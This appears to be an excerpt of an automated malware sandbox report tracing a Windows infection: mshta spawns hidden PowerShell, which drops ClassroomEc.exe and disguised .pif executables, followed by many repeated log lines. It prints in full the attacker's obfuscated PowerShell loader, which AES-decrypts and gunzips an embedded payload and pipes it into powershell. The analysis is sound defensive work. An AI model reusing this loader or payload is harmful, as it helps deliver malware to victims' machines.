Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Google Drive.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.5.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: calc.pdbGCTL source: mshta.exe, 00000000.00000003.1993161798.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003730258.000000000966E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993040179.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1992163204.0000000002BA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003680117.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2004768775.000000000966F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993408260.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003973332.0000000002BE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003585857.0000000002BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1991920596.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: Identification.pif, 00000013.00000003.2953589381.0000000001990000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Identification.pif, 00000013.00000003.2953335217.0000000008A90000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2953190049.00000000088F0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: calc.pdb source: mshta.exe, 00000000.00000003.1993161798.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2003730258.000000000966E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993040179.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1992163204.0000000002BA1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2004768775.000000000966F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1993408260.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1991920596.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Identification.pif, 00000013.00000003.2953335217.0000000008A90000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000013.00000003.2953190049.00000000088F0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: Identification.pif, 00000013.00000003.2954114221.0000000008B10000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: Identification.pif, 00000013.00000003.2953589381.0000000001990000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.Trans

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ \| powershell -
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ \| powershell -			Jump to behavior

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

Code function: 8_2_00A79F30 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,

8_2_00A79F30

Source: Producing.8.dr	Static PE information: real checksum: 0xf5a21 should be: 0x30d94
Source: ClassroomEc.exe.4.dr	Static PE information: real checksum: 0x128df5 should be: 0x136e72

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04F3284D pushfd ; ret	2_2_04F32851
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_04D5035D push ebx; ret	4_2_04D5035B
Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Code function: 8_2_00A97C59 push ecx; ret	8_2_00A97C6C

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	File created: C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Producing	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	File created: C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\ClassroomEc.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\ClassroomEc.exe

File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Producing

Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
